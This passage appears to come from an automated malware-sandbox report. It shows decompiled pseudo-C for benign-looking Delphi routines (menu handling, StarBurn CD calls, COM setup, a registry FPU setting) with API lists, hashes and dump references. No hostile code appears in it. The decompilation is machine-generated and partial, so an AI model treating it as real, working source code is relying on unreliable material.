								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
								_t64 = GetMenu(E0044B158(_t92));
								_t137 = _t61 - _t64;
								if(_t61 != _t64) {
									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
									SetMenu(E0044B158(_t92), _t70);
								}
								E004582B8(_t112, E0044B158(_t92), _t137);
							}
							L30:
							if( *((char*)(_t92 + 0x22e)) != 0) {
								E0045F8EC(_t92, 1);
							}
							E0045E758(_t92);
							_pop(_t97);
							 *[fs:eax] = _t97;
							_push(0x45e9ed);
							return E00404A40( &_v20);
						}
					}
				}
				_t77 =  *0x490b80; // 0x2480e74
				_t79 = E00462054(_t77) - 1;
				if(_t79 >= 0) {
					_v8 = _t79 + 1;
					_t110 = 0;
					do {
						_t81 =  *0x490b80; // 0x2480e74
						if(_t112 ==  *((intOrPtr*)(E00462040(_t81, _t110) + 0x248))) {
							_t83 =  *0x490b80; // 0x2480e74
							if(_t92 != E00462040(_t83, _t110)) {
								_v16 =  *((intOrPtr*)(_t112 + 8));
								_v12 = 0xb;
								_t87 =  *0x48f64c; // 0x423d28
								E00406A3C(_t87, _t93,  &_v20);
								_t93 = _v20;
								E0040CC28(_t92, _v20, 1, _t110, _t112, 0,  &_v16);
								E004043D0();
							}
						}
						_t110 = _t110 + 1;
						_t10 =  &_v8;
						 *_t10 = _v8 - 1;
					} while ( *_t10 != 0);
				}
			}






















      0x0045e829
      0x0045e82b
      0x0045e82e
      0x0045e830
      0x0045e834
      0x0045e835
      0x0045e83a
      0x0045e83d
      0x0045e842
      0x0045e8b4
      0x0045e8b4
      0x0045e8bc
      0x0045e8c0
      0x0045e8c0
      0x0045e8c9
      0x0045e8d5
      0x0045e8d5
      0x0045e8d7
      0x0045e8df
      0x0045e8e5
      0x0045e8e5
      0x0045e8ec
      0x0045e99f
      0x0045e9a4
      0x0045e9a6
      0x0045e9b2
      0x0045e9b2
      0x00000000
      0x0045e905
      0x0045e90f
      0x0045e91e
      0x0045e978
      0x0045e97f
      0x0045e983
      0x0045e988
      0x0045e98a
      0x0045e996
      0x0045e996
      0x0045e98a
      0x00000000
      0x0045e97f
      0x00000000
      0x0045e920
      0x0045e920
      0x0045e929
      0x0045e937
      0x0045e944
      0x0045e949
      0x0045e94b
      0x0045e955
      0x0045e961
      0x0045e961
      0x0045e971
      0x0045e971
      0x0045e9b7
      0x0045e9be
      0x0045e9c4
      0x0045e9c4
      0x0045e9cb
      0x0045e9d2
      0x0045e9d5
      0x0045e9d8
      0x0045e9e5
      0x0045e9e5
      0x0045e90f
      0x0045e8ec
      0x0045e844
      0x0045e84e
      0x0045e851
      0x0045e854
      0x0045e857
      0x0045e859
      0x0045e85b
      0x0045e86b
      0x0045e86f
      0x0045e87b
      0x0045e880
      0x0045e883
      0x0045e890
      0x0045e895
      0x0045e89a
      0x0045e8a4
      0x0045e8a9
      0x0045e8a9
      0x0045e87b
      0x0045e8ae
      0x0045e8af
      0x0045e8af
      0x0045e8af
      0x0045e859

      APIs
      • GetMenu.USER32(00000000), ref: 0045E944
      • SetMenu.USER32(00000000,00000000), ref: 0045E961
      • SetMenu.USER32(00000000,00000000), ref: 0045E996
      • SetMenu.USER32(00000000,00000000,00000000,0045E9E6), ref: 0045E9B2
        • Part of subcall function 00406A3C: LoadStringA.USER32 ref: 00406A6E
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Menu$LoadString
      • String ID: (=B
      • API String ID: 3688185913-992323144
      • Opcode ID: ca15dc53f8cda0c17e908ae54ccc02ddcd155d54cacbe03960d6ea68ad4c276b
      • Instruction ID: 6021b15d72f55bf27c98eda54257d4160799fd5eeae3d5cceddd7615dc897b90
      • Opcode Fuzzy Hash: ca15dc53f8cda0c17e908ae54ccc02ddcd155d54cacbe03960d6ea68ad4c276b
      • Instruction Fuzzy Hash: D751CD70A042409BDB68BB2B8885B5A37959F40309F0845BBFD44EB397CA7CDE4CC799
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00485D60 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93COMMON
      Download Yara Rule
      C-Code - Quality: 48%
      			E00485D60(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v1044;
				char _v1098;
				char _v1104;
				void* _t34;
				char* _t38;
				intOrPtr* _t47;
				void* _t54;
				intOrPtr _t63;
				void* _t69;
				void* _t70;
				intOrPtr _t71;
				void* _t72;

				_t74 = __fp0;
				_t65 = __edi;
				_t69 = _t70;
				_t71 = _t70 + 0xfffffbb4;
				_push(__ebx);
				_push(__esi);
				_v1104 = 0;
				_v12 = 0;
				_v8 = __eax;
				_push(_t69);
				_push(0x485e98);
				_push( *[fs:eax]);
				 *[fs:eax] = _t71;
				_push(_t69);
				_push(0x485e70);
				_push( *[fs:edx]);
				 *[fs:edx] = _t71;
				_t72 =  *((intOrPtr*)(_v8 + 0x44)) - 1;
				if(_t72 < 0) {
					_v16 = 0;
					_t54 = 0;
					do {
						E004091E4( &_v1104);
						E00404D4C( &_v12, _v1104, 0x485ec4);
						_push(1);
						_t34 = E00404F00(_v12);
						_t67 = _t34;
						_push(_t34);
						_push(0);
						_push(0);
						_push( &_v1098);
						_push( &_v20);
						_push(0x400);
						_push( &_v1044);
						_t38 =  &_v16;
						_push(_t38);
						L00465E04();
						if(_t38 == 0) {
							if(_v16 != 0) {
								_push( &_v16);
								L00465DCC();
								_v16 = 0;
							}
							E0047C854(_t54, _t65, _t67, _t74, 0xa,  *((intOrPtr*)(_v8 + 0x40)), 0, _t67);
						}
						_t54 = _t54 + 1;
					} while (_t54 != 0x15);
					L9:
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(0x485e77);
					return E00422604(_v8);
				}
				if(_t72 == 0) {
					_t47 =  *0x48f538; // 0x490c50
					E0047FD7C( *_t47, __ebx, 0, "FindDevice", __edi, __esi, __fp0);
					_push( *((intOrPtr*)(_v8 + 0x40)));
					_push(E0047C854);
					_push(0);
					_push(5);
					L00465ECC();
				}
				goto L9;
			}



















      0x00485d60
      0x00485d60
      0x00485d61
      0x00485d63
      0x00485d69
      0x00485d6a
      0x00485d6d
      0x00485d73
      0x00485d76
      0x00485d7b
      0x00485d7c
      0x00485d81
      0x00485d84
      0x00485d89
      0x00485d8a
      0x00485d8f
      0x00485d92
      0x00485d9b
      0x00485d9d
      0x00485dd5
      0x00485dd8
      0x00485dda
      0x00485de2
      0x00485df5
      0x00485dfa
      0x00485dff
      0x00485e04
      0x00485e06
      0x00485e07
      0x00485e09
      0x00485e11
      0x00485e15
      0x00485e16
      0x00485e21
      0x00485e22
      0x00485e25
      0x00485e26
      0x00485e2d
      0x00485e33
      0x00485e38
      0x00485e39
      0x00485e40
      0x00485e40
      0x00485e4f
      0x00485e4f
      0x00485e54
      0x00485e55
      0x00485e5a
      0x00485e5c
      0x00485e5f
      0x00485e62
      0x00485e6f
      0x00485e6f
      0x00485d9f
      0x00485da5
      0x00485db3
      0x00485dbe
      0x00485dc4
      0x00485dc5
      0x00485dc7
      0x00485dc9
      0x00485dc9
      0x00000000

      APIs
      • StarBurn_FindDevice.STARBURN(00000005,00000000,Function_0007C854,?,00000000,00485E70,?,00000000,00485E98), ref: 00485DC9
      • StarBurn_CdvdBurnerGrabber_CreateEx.STARBURN(?,?,00000400,?,?,00000000,00000000,00000000,00000001,00000000,00485E70,?,00000000,00485E98), ref: 00485E26
      • StarBurn_Destroy.STARBURN(00000000,?,?,00000400,?,?,00000000,00000000,00000000,00000001,00000000,00485E70,?,00000000,00485E98), ref: 00485E39
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Burn_Star$BurnerCdvdCreateDestroyDeviceFindGrabber_
      • String ID: CdRom$FindDevice
      • API String ID: 3375253413-715927625
      • Opcode ID: 3dc1cae661a1b3e644fb63b90f2776a5c903fe8f746edbde0865b73b00b9a3d8
      • Instruction ID: 9020ce5f36a88ee8ae574699db8ee35f6f41434bcadca601374072c812b48805
      • Opcode Fuzzy Hash: 3dc1cae661a1b3e644fb63b90f2776a5c903fe8f746edbde0865b73b00b9a3d8
      • Instruction Fuzzy Hash: 1F318475A00608AFDB10EFA5CC81FEE77B8EB49704F1184BAF604E7291D6789E44CB59
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0047AA10 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76libraryloaderCOMMON
      Download Yara Rule
      C-Code - Quality: 75%
      			E0047AA10(char __edx, void* __edi, void* __fp0) {
				char _v5;
				void* __ecx;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t24;
				char _t28;
				intOrPtr* _t29;
				intOrPtr* _t35;
				char _t40;
				void* _t45;
				intOrPtr _t47;
				struct HINSTANCE__* _t48;
				void* _t49;
				void* _t50;
				void* _t57;

				_t57 = __fp0;
				_t45 = __edi;
				_t40 = __edx;
				if(__edx != 0) {
					_t50 = _t50 + 0xfffffff0;
					_t14 = E00403F68(_t14, _t49);
				}
				_v5 = _t40;
				_t35 = _t14;
				E0046ECD4(0x200);
				E00436844(0, _t45, _t57);
				 *((intOrPtr*)(_t35 + 0x278)) = E0045B61C(0x47aeb0, _t35);
				E0047B588(_t35, 1);
				 *((intOrPtr*)( *_t35 + 0x10c))();
				_t24 =  *((intOrPtr*)(_t35 + 0x23c));
				 *((intOrPtr*)(_t24 + 0x10)) = _t35;
				 *((intOrPtr*)(_t35 + 0x28c)) =  *((intOrPtr*)(_t24 + 0x14));
				_t47 = E00403BC0(1);
				 *((intOrPtr*)(_t35 + 0x27c)) = _t47;
				 *((intOrPtr*)(_t47 + 0xc)) = _t35;
				 *((intOrPtr*)(_t47 + 8)) = 0x47ad0c;
				 *((char*)(_t35 + 0x289)) = 0;
				_t28 =  *0x47ab18; // 0x2
				 *((char*)(_t35 + 0x26c)) = _t28;
				if( *0x490c24 == 0) {
					 *0x490c24 = 1;
					_t48 = GetModuleHandleA("ole32.dll");
					if(_t48 != 0) {
						 *0x490c20 = GetProcAddress(_t48, "CoInitializeEx");
					}
				}
				if( *0x490c20 == 0) {
					_push(0);
					L00416C2C();
				} else {
					 *0x490c20(0, 2);
				}
				_t29 = _t35;
				if(_v5 != 0) {
					E00403FC0(_t29);
					_pop( *[fs:0x0]);
				}
				return _t35;
			}


















      0x0047aa10
      0x0047aa10
      0x0047aa10
      0x0047aa18
      0x0047aa1a
      0x0047aa1d
      0x0047aa1d
      0x0047aa24
      0x0047aa27
      0x0047aa2e
      0x0047aa39
      0x0047aa49
      0x0047aa58
      0x0047aa63
      0x0047aa69
      0x0047aa6f
      0x0047aa75
      0x0047aa87
      0x0047aa89
      0x0047aa8f
      0x0047aa92
      0x0047aa99
      0x0047aaa0
      0x0047aaa5
      0x0047aab2
      0x0047aab4
      0x0047aac5
      0x0047aac9
      0x0047aad6
      0x0047aad6
      0x0047aac9
      0x0047aae2
      0x0047aaf0
      0x0047aaf2
      0x0047aae4
      0x0047aae8
      0x0047aae8
      0x0047aaf7
      0x0047aafd
      0x0047aaff
      0x0047ab04
      0x0047ab0b
      0x0047ab14

      APIs
      • GetModuleHandleA.KERNEL32(ole32.dll), ref: 0047AAC0
      • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 0047AAD1
      • CoInitialize.OLE32(00000000), ref: 0047AAF2
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AddressHandleInitializeModuleProc
      • String ID: CoInitializeEx$ole32.dll
      • API String ID: 3965314501-4163290989
      • Opcode ID: f9610e9864207c41553b23f7a7d49b256a86f7c090fe6a4b78199707071065b5
      • Instruction ID: 7b073a38b1ee5512eb0d308035bc425582344909d9c14bd0c412381b1404ed62
      • Opcode Fuzzy Hash: f9610e9864207c41553b23f7a7d49b256a86f7c090fe6a4b78199707071065b5
      • Instruction Fuzzy Hash: 7D21E5306052409FD304AF3D98897897BD0AB59308F14857FE84C9B397DAB99C04CB6E
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042384C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59registryCOMMON
      Download Yara Rule
      C-Code - Quality: 93%
      			E0042384C(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;
				CHAR* _t24;

				_t6 =  *0x490664; // 0x400000
				 *0x48e4ac = _t6;
				_t8 =  *0x48e4c0; // 0x42383c
				_t9 =  *0x490664; // 0x400000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L00407550 != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x490664; // 0x400000
						_t20 =  *0x48e4c0; // 0x42383c
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x48e49c);
				}
				_t13 =  *0x490664; // 0x400000
				_t24 =  *0x48e4c0; // 0x42383c
				_t22 = E00407ACC(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E00423758(_a4, _a8));
				}
				return _t22;
			}














      0x00423853
      0x00423858
      0x00423861
      0x00423867
      0x0042386d
      0x00423875
      0x00423877
      0x0042387a
      0x00423888
      0x0042388a
      0x00423890
      0x00423896
      0x00423896
      0x004238a0
      0x004238a0
      0x004238b6
      0x004238c3
      0x004238d3
      0x004238da
      0x004238eb
      0x004238eb
      0x004238f6

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Class$InfoLongRegisterUnregisterWindow
      • String ID: <8B
      • API String ID: 4025006896-1568496033
      • Opcode ID: 1f814bfd6048da7cc461f75fa6d4946ef528de129486f71893ed62e8101acf9c
      • Instruction ID: 420f45fd13801531c3d67010627692b035290d1057c6f930145b2669d5602726
      • Opcode Fuzzy Hash: 1f814bfd6048da7cc461f75fa6d4946ef528de129486f71893ed62e8101acf9c
      • Instruction Fuzzy Hash: E3015E72B042046FDB00EF5AAC81F5A33A8AB58715F504A3AF608EB2E1D639ED14875D
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00403A5C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
      Download Yara Rule
      C-Code - Quality: 65%
      			E00403A5C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x48e020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x48e020; // 0x1372
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x48e020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00403ACD);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x403ad4);
					return RegCloseKey(_v8);
				}
			}












      0x00403a5d
      0x00403a5f
      0x00403a69
      0x00403a85
      0x00403ad4
      0x00403ae6
      0x00403ae9
      0x00403af2
      0x00403a87
      0x00403a89
      0x00403a8a
      0x00403a8f
      0x00403a92
      0x00403a95
      0x00403ab1
      0x00403ab8
      0x00403abb
      0x00403abe
      0x00403acc
      0x00403acc

      APIs
      • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403A7E
      • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AB1
      • RegCloseKey.ADVAPI32(?,00403AD4,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AC7
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CloseOpenQueryValue
      • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
      • API String ID: 3677997916-4173385793
      • Opcode ID: bcf38888f88c271f0d3ae7e0a76ad53aed03b07e407fdf46e4afd9d5facd449b
      • Instruction ID: c1c799c41c43bef3537b13398d514e3d0a6f6023418515aed053cb9496fee5ee
      • Opcode Fuzzy Hash: bcf38888f88c271f0d3ae7e0a76ad53aed03b07e407fdf46e4afd9d5facd449b
      • Instruction Fuzzy Hash: 12015675A50308BAE711EF91CC42BA977ACE709B05F200876B900E65D1E7B96A10CB5C
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0045D2A0 Relevance: 7.7, APIs: 5, Instructions: 176COMMON
      Download Yara Rule
      C-Code - Quality: 90%
      			E0045D2A0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				int _t100;
				int _t102;
				intOrPtr _t119;
				int _t124;
				intOrPtr _t157;
				signed char _t165;
				signed char _t166;
				void* _t168;
				signed char _t183;
				intOrPtr _t185;
				intOrPtr _t197;
				void* _t200;
				void* _t202;
				int _t203;
				intOrPtr _t207;
				void* _t209;
				signed char _t210;

				_t200 = __edi;
				_t206 = _t207;
				_t202 = __edx;
				_v8 = __eax;
				E004479C0(_v8);
				_push(_t207);
				_push(0x45d508);
				_push( *[fs:edx]);
				 *[fs:edx] = _t207;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t168 = 0;
				_t209 = E00403B7C( *_v8) -  *0x45a110; // 0x45a15c
				if(_t209 == 0) {
					_t165 =  *0x490661; // 0x0
					_t166 = _t165 ^ 0x00000001;
					_t210 = _t166;
					 *(_v8 + 0x234) = _t166;
				}
				E0044711C(_v8, _t168, _t202, _t210);
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L14:
					_t100 =  *(_v8 + 0x268);
					_t219 = _t100;
					if(_t100 > 0) {
						E00444344(_v8, _t100, _t219);
					}
					_t102 =  *(_v8 + 0x26c);
					_t220 = _t102;
					if(_t102 > 0) {
						E00444388(_v8, _t102, _t220);
					}
					_t183 =  *0x45d514; // 0x0
					 *(_v8 + 0x98) = _t183;
					_t221 = _t168;
					if(_t168 == 0) {
						E0045C900(_v8, 1, 1);
						E0044AC1C(_v8, 1, 1, _t221);
					}
					E00445AE8(_v8, 0, 0xb03d, 0);
					_pop(_t185);
					 *[fs:eax] = _t185;
					_push(0x45d50f);
					return E004479C8(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t197 =  *0x490b80; // 0x2480e74
						_t23 = _t197 + 0x40; // 0x60
						if( *(_v8 + 0x25c) !=  *_t23) {
							_t157 =  *0x490b80; // 0x2480e74
							_t26 = _t157 + 0x40; // 0x60
							E00425D14( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00425D0C( *((intOrPtr*)(_v8 + 0x68))),  *_t26,  *(_v8 + 0x25c)), _t200, _t206);
						}
					}
					_t119 =  *0x490b80; // 0x2480e74
					_t29 = _t119 + 0x40; // 0x60
					 *(_v8 + 0x25c) =  *_t29;
					_t203 = E0045D638(_v8);
					_t124 =  *(_v8 + 0x270);
					_t215 = _t203 - _t124;
					if(_t203 != _t124) {
						_t168 = 1;
						E0045C900(_v8, _t124, _t203);
						E0044AC1C(_v8,  *(_v8 + 0x270), _t203, _t215);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t203,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t203,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t203,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t203,  *(_v8 + 0x270));
						}
					}
					goto L14;
				}
			}





















      0x0045d2a0
      0x0045d2a1
      0x0045d2a6
      0x0045d2a8
      0x0045d2ae
      0x0045d2b5
      0x0045d2b6
      0x0045d2bb
      0x0045d2be
      0x0045d2c6
      0x0045d2d1
      0x0045d2dc
      0x0045d2e2
      0x0045d2ee
      0x0045d2f4
      0x0045d2f6
      0x0045d2fb
      0x0045d2fb
      0x0045d300
      0x0045d300
      0x0045d30b
      0x0045d31a
      0x0045d47c
      0x0045d47f
      0x0045d485
      0x0045d487
      0x0045d48e
      0x0045d48e
      0x0045d496
      0x0045d49c
      0x0045d49e
      0x0045d4a5
      0x0045d4a5
      0x0045d4ad
      0x0045d4b3
      0x0045d4b9
      0x0045d4bb
      0x0045d4ca
      0x0045d4dc
      0x0045d4dc
      0x0045d4ed
      0x0045d4f4
      0x0045d4f7
      0x0045d4fa
      0x0045d507
      0x0045d330
      0x0045d33a
      0x0045d345
      0x0045d34b
      0x0045d34e
      0x0045d35a
      0x0045d35f
      0x0045d37a
      0x0045d37a
      0x0045d34e
      0x0045d37f
      0x0045d384
      0x0045d38a
      0x0045d398
      0x0045d39d
      0x0045d3a3
      0x0045d3a5
      0x0045d3ab
      0x0045d3b4
      0x0045d3c7
      0x0045d3d6
      0x0045d3f5
      0x0045d3f5
      0x0045d405
      0x0045d424
      0x0045d424
      0x0045d434
      0x0045d453
      0x0045d476
      0x0045d476
      0x0045d434
      0x00000000
      0x0045d3a5

      APIs
      • MulDiv.KERNEL32(00000000,00000060,00000000), ref: 0045D371
      • MulDiv.KERNEL32(?,00000000,00000000), ref: 0045D3ED
      • MulDiv.KERNEL32(?,00000000,00000000), ref: 0045D41C
      • MulDiv.KERNEL32(?,00000000,00000000), ref: 0045D44B
      • MulDiv.KERNEL32(?,00000000,00000000), ref: 0045D46E
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID:
      • String ID:
